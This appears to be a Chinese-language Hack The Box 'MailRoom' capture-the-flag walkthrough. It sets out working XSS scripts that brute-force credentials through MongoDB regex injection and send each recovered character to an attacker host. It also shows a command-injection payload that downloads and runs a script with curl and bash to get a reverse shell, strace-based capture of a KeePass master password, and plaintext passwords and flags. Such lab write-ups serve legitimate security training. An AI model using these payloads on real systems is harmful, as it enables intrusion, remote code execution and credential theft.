参考这位up主的:
Hack The Box 赛季活动靶场【MailRoom】System Flag攻略_哔哩哔哩_bilibili
Hack The Box 赛季活动靶场【MailRoom】User Flag攻略_哔哩哔哩_bilibili
在留言板XSS打内网的网页(这个网页存在MongoDB正则表达式注入,根据返回的http状态码,来盲注密码)
git clone https://github.com/SrcVme50/Mailroom
guess_username.js
async function callAuth(mail) {
var http = new XMLHttpRequest();
http.open('POST', "http://staff-review-panel.mailroom.htb/auth.php", true);
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
http.onload = function () {
if (/"success":true/.test(this.responseText)) {
notify(mail);
cal("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%'()+, -/:;<=>@[\]_`{}~", mail);
}
};
http.send("email[$regex]=.*" + mail + "@mailroom.htb&password[$ne]=abc");
}
function notify(mail) {
fetch("http://10.10.14.50:30088/r8.sh?" + mail);
}
function cal(chars, mail) {
for (var i = 0; i < chars.length; i++) {
callAuth(chars[i] + mail)
}
}
var chars88 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%'()+, -/:;<=>@[\]_`{}~";
cal(chars88, "")
guess_password.js
async function callAuth2(pass) {
var http = new XMLHttpRequest();
http.open('POST', "http://staff-review-panel.mailroom.htb/auth.php", true);
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
http.onload = function () {
if (/"success":true/.test(this.responseText)) {
notify2(pass);
cal2("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#%'()+, -/:;<=>@[\]_`{}~", pass);
}
};
http.send("[email protected]&password[$regex]=^"+pass);
}
function notify2(pass) {
fetch("http://10.10.14.50:30088/r8.sh?" + pass);
}
function cal2(chars, pass) {
for (var i = 0; i < chars.length; i++) {
callAuth2(pass+chars[i])
}
}
var chars99 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#%'()+, -/:;<=>@[\]_`{}~";
cal2(chars99, "");
root@071381841c9e:/var/www/staffroom# cat auth.php
false, 'message' => 'Failed to connect to the database']);
exit;
}
$collection = $client->backend_panel->users; // Select the users collection
// Authenticate user & Send 2FA if valid
if (isset($_POST['email']) && isset($_POST['password'])) {
// Verify the parameters are valid
if (!is_string($_POST['email']) || !is_string($_POST['password'])) {
header('HTTP/1.1 401 Unauthorized');
echo json_encode(['success' => false, 'message' => 'Invalid input detected']);
}
// Check if the email and password are correct
$user = $collection->findOne(['email' => $_POST['email'], 'password' => $_POST['password']]);
if ($user) {
// Generate a random UUID for the 2FA token
$token = bin2hex(random_bytes(16));
$now = time();
// Update the user record in the database with the 2FA token if not already sent in the last minute
$user = $collection->findOne(['_id' => $user['_id']]);
if(($user['2fa_token'] && ($now - $user['token_creation']) > 60) || !$user['2fa_token']) {
$collection->updateOne(
['_id' => $user['_id']],
['$set' => ['2fa_token' => $token, 'token_creation' => $now]]
);
// Send an email to the user with the 2FA token
$to = $user['email'];
$subject = '2FA Token';
$message = 'Click on this link to authenticate: http://staff-review-panel.mailroom.htb/auth.php?token=' . $token;
mail($to, $subject, $message);
}
// Return a JSON response notifying about 2fa
echo json_encode(['success' => true, 'message' => 'Check your inbox for an email with your 2FA token']);
exit;
} else {
// Return a JSON error response
header('HTTP/1.1 401 Unauthorized');
echo json_encode(['success' => false, 'message' => 'Invalid email or password']);
}
}
// Check for invalid parameters
else if (!isset($_GET['token'])) {
header('HTTP/1.1 400 Bad Request');
echo json_encode(['success' => false, 'message' => 'Email and password are required']);
exit;
}
// Check if the form has been submitted
else if (isset($_GET['token'])) {
// Verify Token parameter is valid
if (!is_string($_GET['token']) || strlen($_GET['token']) !== 32) {
header('HTTP/1.1 401 Unauthorized');
echo json_encode(['success' => false, 'message' => 'Invalid input detected']);
exit;
}
// Check if the token is correct
$user = $collection->findOne(['2fa_token' => $_GET['token']]);
if ($user) {
// Set the logged_in flag and name in the session
$_SESSION['logged_in'] = true;
$_SESSION['name'] = explode('@', $user['email'])[0];
// Remove 2FA token since user already used it to log in
$collection->updateOne(
['_id' => $user['_id']],
['$unset' => ['2fa_token' => '']]
);
// Redirect to dashboard since login was successful
header('Location: dashboard.php');
exit;
} else {
// Return a JSON error response
header('HTTP/1.1 401 Unauthorized');
echo json_encode(['success' => false, 'message' => 'Invalid 2FA Login Token']);
exit;
}
}
?>
root@071381841c9e:/var/www/staffroom#
# 如下 之前是http://10.10.14.37:77/user.js ,后期才发现火狐浏览器禁止访问77端口,像8080,和8090等高端口不做限制 所以把77换成30088;
cd /tmp;
npm install -g http-server
# -g --global 会将模块安装到全局
http-server -p 30088 --cors=access-control-allow-origin &
curl -v -d 'email=123%40gmail.com&title=Ad_maga&message=' http://mailroom.htb/contact.php
# curl http://mailroom.htb/inquiries/a527e53f4ffd0574844e7483ba0904a9.html |grep -C5 10.10.14.50
POST /contact.php HTTP/1.1
Host: mailroom.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Origin: http://mailroom.htb
Connection: close
Referer: http://mailroom.htb/contact.php
Upgrade-Insecure-Requests: 1
email=12342%40gmail.com&title=Ad_maga&message=
root@79585e1c3ddf:/var/www/mailroom/template# cat ai.py
#!/usr/bin/python3
# This script is used to simulate the Ai visiting the page and rating if the inquery looks relevent or irrelevant
import os
import sys
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.firefox.service import Service
# "Hack" to fix Firefox not launching without a writable home directory
os.environ["HOME"] = "/tmp"
def main(id):
options = Options()
options.add_argument('--headless')
driver = webdriver.Firefox(service=Service(executable_path='/var/www/mailroom/template/geckodriver', log_path='/dev/null'), options=options)
driver.set_page_load_timeout(30)
try:
driver.get(f"http://127.0.0.1/inquiries/{id}.html")
print(driver.title)
finally:
driver.close()
if __name__ == '__main__':
if len(sys.argv) < 2 or len(sys.argv[1]) != 32:
exit()
main(sys.argv[1])
root@79585e1c3ddf:/var/www/mailroom/template#
如下可以爆php路径:
root@mailroom:~# curl -v -d "email[]=qwe&password[]=abc" http://staff-review-panel.mailroom.htb/auth.php;
* Trying 127.0.0.1:80...
* TCP_NODELAY set
* Connected to staff-review-panel.mailroom.htb (127.0.0.1) port 80 (#0)
> POST /auth.php HTTP/1.1
> Host: staff-review-panel.mailroom.htb
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 26
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 26 out of 26 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 401 Unauthorized
< Date: Tue, 02 May 2023 12:19:20 GMT
< Server: Apache/2.4.54 (Debian)
< X-Powered-By: PHP/7.4.33
< Set-Cookie: PHPSESSID=58a2b1cce2a8d677a0f63c16d0fed89a; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Access-Control-Allow-Origin: *
< Content-Length: 303
< Content-Type: application/json
<
{"success":false,"message":"Invalid input detected"}
Warning: Cannot modify header information - headers already sent by (output started at /var/www/staffroom/auth.php:20) in /var/www/staffroom/auth.php on line 51
* Connection #0 to host staff-review-panel.mailroom.htb left intact
{"success":false,"message":"Invalid email or password"}root@mailroom:~#
root@mailroom:~#
root@mailroom:~# curl -v -d 'email[$regex]=.*)@mailroom.htb&password[$ne]=abc' http://staff-review-panel.mailroom.htb/auth.php;
* Trying 127.0.0.1:80...
* TCP_NODELAY set
* Connected to staff-review-panel.mailroom.htb (127.0.0.1) port 80 (#0)
> POST /auth.php HTTP/1.1
> Host: staff-review-panel.mailroom.htb
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 48
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 48 out of 48 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 401 Unauthorized
< Date: Tue, 02 May 2023 12:24:00 GMT
< Server: Apache/2.4.54 (Debian)
< X-Powered-By: PHP/7.4.33
< Set-Cookie: PHPSESSID=9105dc031fc8878b739a6948f2d27b79; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Access-Control-Allow-Origin: *
< Content-Length: 917
< Content-Type: application/json
<
{"success":false,"message":"Invalid input detected"}
Fatal error: Uncaught MongoDB\Driver\Exception\CommandException: Regular expression is invalid: unmatched parentheses in /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php:316
Stack trace:
#0 /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php(316): MongoDB\Driver\Server->executeQuery('backend_panel.u...', Object(MongoDB\Driver\Query), Array)
#1 /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/FindOne.php(126): MongoDB\Operation\Find->execute(Object(MongoDB\Driver\Server))
#2 /var/www/staffroom/vendor/mongodb/mongodb/src/Collection.php(699): MongoDB\Operation\FindOne->execute(Object(MongoDB\Driver\Server))
#3 /var/www/staffroom/auth.php(24): MongoDB\Collection->findOne(Array)
#4 {main}
thrown in /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php on line 316
* Connection #0 to host staff-review-panel.mailroom.htb left intact
root@mailroom:~#
Regular expression is invalid: unmatched parentheses
parentheses:圆括号
root@mailroom:~# curl -v -d 'email[$regex]=.*(@mailroom.htb&password[$ne]=abc' http://staff-review-panel.mailroom.htb/auth.php;
* Trying 127.0.0.1:80...
* TCP_NODELAY set
* Connected to staff-review-panel.mailroom.htb (127.0.0.1) port 80 (#0)
> POST /auth.php HTTP/1.1
> Host: staff-review-panel.mailroom.htb
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 48
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 48 out of 48 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 401 Unauthorized
< Date: Tue, 02 May 2023 12:27:33 GMT
< Server: Apache/2.4.54 (Debian)
< X-Powered-By: PHP/7.4.33
< Set-Cookie: PHPSESSID=87d6127a132d28b22f6e2336eb9e99e5; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Access-Control-Allow-Origin: *
< Content-Length: 905
< Content-Type: application/json
<
{"success":false,"message":"Invalid input detected"}
Fatal error: Uncaught MongoDB\Driver\Exception\CommandException: Regular expression is invalid: missing ) in /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php:316
Stack trace:
#0 /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php(316): MongoDB\Driver\Server->executeQuery('backend_panel.u...', Object(MongoDB\Driver\Query), Array)
#1 /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/FindOne.php(126): MongoDB\Operation\Find->execute(Object(MongoDB\Driver\Server))
#2 /var/www/staffroom/vendor/mongodb/mongodb/src/Collection.php(699): MongoDB\Operation\FindOne->execute(Object(MongoDB\Driver\Server))
#3 /var/www/staffroom/auth.php(24): MongoDB\Collection->findOne(Array)
#4 {main}
thrown in /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php on line 316
* Connection #0 to host staff-review-panel.mailroom.htb left intact
root@mailroom:~#
Regular expression is invalid: missing )
curl -v -d 'email[$regex]=.*[@mailroom.htb&password[$ne]=abc' http://staff-review-panel.mailroom.htb/auth.php;
Fatal error: Uncaught MongoDB\Driver\Exception\CommandException: Regular expression is invalid: missing terminating ] for character class in /var...
ai.py脚本貌似有时间(30秒超时:driver.set_page_load_timeout(30) )限制,一次不一定会把用户名和密码完全跑出来,需要多试几次,或者手动改脚本接力.
[2023-05-02T12:48:39.661Z] "GET /guess_username.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:48:40.571Z] "GET /r8.sh?n" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:48:41.191Z] "GET /r8.sh?an" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:48:42.313Z] "GET /r8.sh?tan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:07.703Z] "GET /guess_password.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:16.170Z] "GET /r8.sh?6" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:17.026Z] "GET /r8.sh?69" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:17.700Z] "GET /r8.sh?69t" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:18.075Z] "GET /r8.sh?69tr" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:19.371Z] "GET /r8.sh?69tri" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:21.002Z] "GET /r8.sh?69tris" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:23.135Z] "GET /r8.sh?69trisR" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:24.445Z] "GET /r8.sh?69trisRu" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:26.546Z] "GET /r8.sh?69trisRul" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:27.895Z] "GET /r8.sh?69trisRule" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:30.574Z] "GET /r8.sh?69trisRulez" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:31.304Z] "GET /r8.sh?69trisRulez!" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:51:56.771Z] "GET /guess_password.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:51:57.689Z] "GET /r8.sh?6" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:51:58.201Z] "GET /r8.sh?69" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:51:59.442Z] "GET /r8.sh?69t" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:52:04.265Z] "GET /r8.sh?69tr" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
继续想办法把时间拉长的30秒极限:
curl -v -d 'email=qax%40gmail.com&title=maga2023&message=' http://mailroom.htb/contact.php
生成的html包含2个js加载器,第二个的服务器端为php( http://10.10.14.50:8090/)
http://10.10.14.50:8090/?c=123 的内容为:
echo "/tmp/index.php ;
启动php的命令为:
cat /tmp/index.php ;
setsid php -n -S 0.0.0.0:8090 -t /tmp&
这样制作的话,服务器里的selenium不会那么快退出.
在30秒内,username能猜解完毕,password还差几位字符,需要接力(不接力了,多试几次就ok):
[2023-05-02T15:39:12.945Z] "GET /guess_username.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:19.952Z] "GET /r8.sh?n" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:20.744Z] "GET /r8.sh?an" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:21.258Z] "GET /r8.sh?tan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:21.683Z] "GET /r8.sh?stan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:23.333Z] "GET /r8.sh?istan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:24.978Z] "GET /r8.sh?ristan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:26.546Z] "GET /r8.sh?tristan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:54.784Z] "GET /guess_password.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:55.901Z] "GET /r8.sh?6" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:56.770Z] "GET /r8.sh?69" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:57.557Z] "GET /r8.sh?69t" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:59.597Z] "GET /r8.sh?69tr" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:02.004Z] "GET /r8.sh?69tri" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:04.039Z] "GET /r8.sh?69tris" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:06.605Z] "GET /r8.sh?69trisR" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:08.711Z] "GET /r8.sh?69trisRu" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:10.680Z] "GET /r8.sh?69trisRul" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:11.877Z] "GET /r8.sh?69trisRule" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:14.318Z] "GET /r8.sh?69trisRulez" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:20.160Z] "GET /r8.sh?69trisRulez!" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
ssh仅仅允许tristan登录:
grep Match /etc/ssh/sshd_config;
# ssh -o StrictHostKeyChecking=no [email protected]
# paaword: a$gBa3!GA8
ssh -o StrictHostKeyChecking=no [email protected]
tristan 密码:69trisRulez!
ssh登录成功后:
#使用curl发送登录请求:
curl -v -d "email=tristan%40mailroom.htb&password=69trisRulez%21" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" http://staff-review-panel.mailroom.htb/auth.php;
# 状态码200 {"success":true,"message":"Check your inbox for an email with your 2FA token"}
grep -o -E "(http://.*)" /var/mail/tristan
# 选最后一条:
myurl2=$(grep -o -E "(http://.*)" /var/mail/tristan|tail -n 1);
echo $myurl2;
#访问激活邮件:
#http://staff-review-panel.mailroom.htb/auth.php?token=2ae50255deba57587ac9f9555857beeb
curl -v -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" $myurl2|grep message
# 状态码302 重定向到dashboard.php
#访问主页,这一步可以不要:
#curl -v -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" http://staff-review-panel.mailroom.htb/dashboard.php
#插入恶意命令:
curl -v --data-binary "inquiry_id=\`sleep+12
curl+-o+/tmp/3r2+http://10.10.14.37:77/r0.sh
bash+/tmp/3r2
echo+-n+1\`" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" \
http://staff-review-panel.mailroom.htb/inspect.php
反弹shell成功后,发现是在容器里,执行如下一句话看密码:
cat /var/www/mailroom/.git/config /var/www/staffroom/.git/config
url = http://matthew:HueLover83%23@gitea:3000/matthew/mailroom.git
得到matthew密码是:
HueLover83#
回到虚拟机的shell里:
su - matthew
matthew@mailroom:~$ cat ~/user.txt
a371327b52dde700c969109e3315ac3c
matthew@mailroom:~$
ls -al /home/matthew/personal.kdbx; python3 -V ;
scp上传密码库到kali,这一步后来发现也没有必要,直接在靶机里使用kpcli破解密码就行:
scp -P 40022 -o StrictHostKeyChecking=no \
/home/matthew/personal.kdbx [email protected]:/tmp/
提示: 靶机是台虚拟机,会自动清除/tmp目录的文件,但是以.开头的隐藏文件无法删除,所以我保存在/tmp目录下的.pwd.log里.
# strace -o /tmp/.pwd.log -p ` ps -ef|grep kpcli|grep perl|awk '{print $2}' `
matthew@mailroom:/tmp$ ./ps aux
PID USER TIME COMMAND
42939 matthew 0:00 -bash
43013 matthew 0:00 /lib/systemd/systemd --user
43019 matthew 0:00 {kpcli} /usr/bin/perl /usr/bin/kpcli
43023 matthew 0:00 ./ps aux
matthew@mailroom:/tmp$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
matthew 42939 0.2 0.1 8392 5148 pts/2 S 15:57 0:00 -bash
matthew 43013 0.6 0.2 19188 9764 ? Ss 15:57 0:00 /lib/systemd/systemd --user
matthew 43019 1.2 0.6 29520 24468 ? Ss 15:57 0:00 /usr/bin/perl /usr/bin/kpcli
matthew 43030 0.0 0.0 8888 3232 pts/2 R+ 15:57 0:00 ps aux
matthew@mailroom:/tmp$ strace -o /tmp/.pwd.log -p ` ps -ef|grep kpcli|grep perl|awk '{print $2}' `
strace: option requires an argument -- 'p'
Try 'strace -h' for more information.
matthew@mailroom:/tmp$
# 这是因为进程没有启动,它会每隔1分钟启动一次.稍等一会就好
grep "read(0" /tmp/.pwd.log |grep -v unavailable
# grep -E "read|write" /tmp/.pwd.log|grep 8192 |grep read|grep -v unavailable
matthew@mailroom:/tmp$ grep 8192 /tmp/.pwd.log |grep "read(0"|grep -v unavailable
read(0, "!", 8192) = 1
read(0, "s", 8192) = 1
read(0, "E", 8192) = 1
read(0, "c", 8192) = 1
read(0, "U", 8192) = 1
read(0, "r", 8192) = 1
read(0, "3", 8192) = 1
read(0, "p", 8192) = 1
read(0, "4", 8192) = 1
read(0, "$", 8192) = 1
read(0, "$", 8192) = 1
read(0, "w", 8192) = 1
read(0, "0", 8192) = 1
read(0, "1", 8192) = 1
read(0, "\10", 8192) = 1
read(0, "r", 8192) = 1
read(0, "d", 8192) = 1
read(0, "9", 8192) = 1
read(0, "\n", 8192) = 1
matthew@mailroom:/tmp$
root@fv-az345-528:/tmp# grep -E "read|write" /tmp/123123.txt|grep 8192 |grep read|grep -v unavailable
read(5, "\3\331\242\232g\373K\265\1\0\3\0\2\20\0001\301\362\346\277qCP\276X\5!j\374Z\377\3"..., 8192) = 1998
read(0, "!", 8192) = 1
read(0, "s", 8192) = 1
read(0, "E", 8192) = 1
read(0, "c", 8192) = 1
read(0, "U", 8192) = 1
read(0, "r", 8192) = 1
read(0, "3", 8192) = 1
read(0, "p", 8192) = 1
read(0, "4", 8192) = 1
read(0, "$", 8192) = 1
read(0, "$", 8192) = 1
read(0, "w", 8192) = 1
read(0, "0", 8192) = 1
read(0, "1", 8192) = 1
read(0, "\10", 8192) = 1
read(0, "r", 8192) = 1
read(0, "d", 8192) = 1
read(0, "9", 8192) = 1
read(0, "\n", 8192) = 1
read(5, "\3\331\242\232g\373K\265\1\0\3\0\2\20\0001\301\362\346\277qCP\276X\5!j\374Z\377\3"..., 8192) = 1998
read(5, "\npackage Compress::Raw::Zlib;\n\nr"..., 8192) = 8192
read(5, " if $validate && $value !~ /^\\d+"..., 8192) = 8192
read(5, " croak \"Compress::Raw::Zlib::"..., 8192) = 8192
read(5, "# XML::Parser\n#\n# Copyright (c) "..., 8192) = 8192
read(6, "package XML::Parser::Expat;\n\nuse"..., 8192) = 8192
read(6, ";\n }\n}\n\nsub position_in_conte"..., 8192) = 8192
read(5, "package MIME::Base64;\n\nuse stric"..., 8192) = 5450
read(6, "\3\331\242\232g\373K\265\1\0\3\0\2\20\0001\301\362\346\277qCP\276X\5!j\374Z\377\3"..., 8192) = 1998
read(6, "", 8192) = 0
read(7, "# NOTE: Derived from blib/lib/Te"..., 8192) = 665
read(7, "", 8192) = 0
root@fv-az345-528:/tmp#
\10是删除键
如上得知: 密码库的密码是: !sEcUr3p4$$w0rd9
!sEcUr3p4$$w0rd9
如下 自己没有必要安装kpcli,靶机自己就有,直接拿来用,也可以的
keepass2是图形界面工具,本次不用也可以
ubuntu20.04 安装keepass
sudo apt-add-repository ppa:jtaylor/keepass;\
sudo apt-get update && sudo apt-get upgrade;\
sudo apt-get install keepass2 -y;\
sudo apt install kpcli -y;
2.运行keepass2
root@fv-az345-528:/tmp# keepass2 --version
KeePass 2.45
Copyright ? 2003-2020 Dominik Reichl
root@fv-az345-528:/tmp#
kpcli --kdb /tmp/personal.kdbx
ls
cd Root/
ls
show -f -a 4
quit
kpcli:/> cd Root/
kpcli:/Root> ls
=== Entries ===
0. food account door.dash.local
1. GItea Admin account git.mailroom.htb
2. gitea database password
3. My Gitea Account git.mailroom.htb
4. root acc
kpcli:/Root> show -f -a 4
Title: root acc
Uname: root
Pass: a$gBa3!GA8
URL:
Notes: root account for sysadmin jobs
Icon#: 0
Creat: 2023-03-15 21:43:57
Modif: 2023-03-15 21:44:42
Xpire: Never
kpcli:/Root> quit
matthew@mailroom:~$ kpcli --kdb ~/personal.kdbx
Please provide the master password: *************************
KeePass CLI (kpcli) v3.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help ' for details on individual commands.
kpcli:/> ls
=== Groups ===
Root/
kpcli:/> cd Root/
kpcli:/Root> ls
=== Entries ===
0. food account door.dash.local
1. GItea Admin account git.mailroom.htb
2. gitea database password
3. My Gitea Account git.mailroom.htb
4. root acc
kpcli:/Root> show -a -f 4
Title: root acc
Uname: root
Pass: a$gBa3!GA8
URL:
Notes: root account for sysadmin jobs
Icon#: 0
Creat: 2023-03-15 21:43:57
Modif: 2023-03-15 21:44:42
Xpire: Never
kpcli:/Root> quit
matthew@mailroom:~$
matthew@mailroom:/tmp$ su -
Password:
root@mailroom:~# ls
cleanup.sh cleanup.sh.bak containers kpcli.sh matthew_kpcli.py matthew_kpcli.py.bak personal.kdbx personal.kdbx.bak root.txt
root@mailroom:~# cat root.txt
7fe0c9a1297e4b3fb9ab8259c67c63a1
root@mailroom:~#
root@mailroom:~# docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
ed9dafc5f146 containers_sites "docker-php-entrypoi…" 14 hours ago Up 14 hours 0.0.0.0:80->80/tcp, :::80->80/tcp containers_sites_1
be13e7868b63 gitea/gitea:1.18 "/usr/bin/entrypoint…" 14 hours ago Up 14 hours 22/tcp, 3000/tcp containers_gitea_1
a792a1685ae4 postgres:15.1-bullseye "docker-entrypoint.s…" 14 hours ago Up 14 hours 5432/tcp containers_db_1
178ce6c64a6b mongo:4.2.23 "docker-entrypoint.s…" 14 hours ago Up 14 hours 27017/tcp containers_mongodb_1
root@mailroom:~# id
uid=0(root) gid=0(root) groups=0(root)
root@mailroom:~#
# 这步应该不需要了
# docker exec -it containers_sites_1 /bin/bash -c 'chmod +s /bin/bash'
猜测: 一旦root登录成功 perl和kpcli进程就都没了.
看下面,猜的不准,是每隔1分钟运行kpcli进程,每隔3分钟清理
root@mailroom:~# cat ~/cleanup.sh
#!/bin/bash
# Clear inquiries
/usr/bin/rm -rf /root/containers/sites/mailroom/inquiries/*
# Copy back template inquiry
/usr/bin/cp /root/containers/5657465f7712d50b2aaceaa09453c71f.html /root/containers/sites/mailroom/inquiries/
# Restore gitea
/usr/bin/rm -rf /root/containers/gitea/*
/usr/bin/cp -r /root/containers/gitea_backup/* /root/containers/gitea/
# Clear tmp files
/usr/bin/rm -rf /tmp/*
# Clear past emails
echo "$(tail -n 10 /var/mail/tristan)" > /var/mail/tristan
root@mailroom:~# crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
*/3 * * * * /root/cleanup.sh >/dev/null 2>&1
*/1 * * * * /root/kpcli.sh >/dev/null 2>&1
root@mailroom:~#
看一下这台 虚拟机靶机 性能咋样:
